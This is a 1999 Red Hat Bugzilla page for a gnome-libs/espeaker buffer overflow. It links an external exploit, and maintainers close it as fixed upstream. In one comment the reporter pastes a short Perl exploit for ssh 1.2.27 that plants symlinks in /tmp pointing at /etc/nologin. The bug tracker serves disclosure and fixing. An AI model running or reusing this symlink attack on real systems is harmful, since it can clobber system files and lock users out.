Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 5406 - Gnome espeaker local buffer overflow vulnerability
Summary: Gnome espeaker local buffer overflow vulnerability
Keywords:
Status: CLOSED NEXTRELEASE
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: gnome-libs
Version: 6.0
Hardware: All
OS: Linux
high
medium
Target Milestone: ---
Assignee: Elliot Lee
QA Contact:
URL: http://www.securityfocus.com/data/vul...
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 1999-09-27 20:24 UTC by zurk
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 1999-10-27 20:52:14 UTC


Attachments (Terms of Use)

Description zurk 1999-09-27 20:24:21 UTC
Gnome libs 1.08 is affected by a boundary condition error.
For further details see exploit URL:
http://www.securityfocus.com/data/vulnerabilities/exploits/gnox.sh
I've also seen a local exploit for ssh 1.2.27 floating
around, but since that isnt included with redhat 6
officially..i dont know where to post it.

Comment 1 Bill Nottingham 1999-09-28 14:53:59 UTC
FWIW, there are no setuid/setgid root programs that ship with GNOME.


------- Additional Comments From   10/04/99 20:06 -------
hmm...here's the exploit for ssh :
#!/usr/bin/perl

 $pid = $$;

 $whoami = `whoami`;
 chop($whoami);
 mkdir("/tmp/ssh-$whoami", 0700);

 for ($i = $pid; $i < $pid+50; $i++)
 {
 symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
 }


and a relevant link :
http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=660

Comment 2 Bill Nottingham 1999-10-07 18:03:59 UTC
Huh? What does ssh have to do with gnome-libs?

------- Additional Comments From   10/10/99 17:54 -------
sorry...just found the ssh thing that was floating around and didnt
know where to post it..anyway, can we now fix both bugs ? or should i
resubmit it somewhere else ?

Comment 3 Elliot Lee 1999-10-27 20:52:59 UTC
This bug is fixed in esound cvs, will be in next release.


Note You need to log in before you can comment on or make changes to this bug.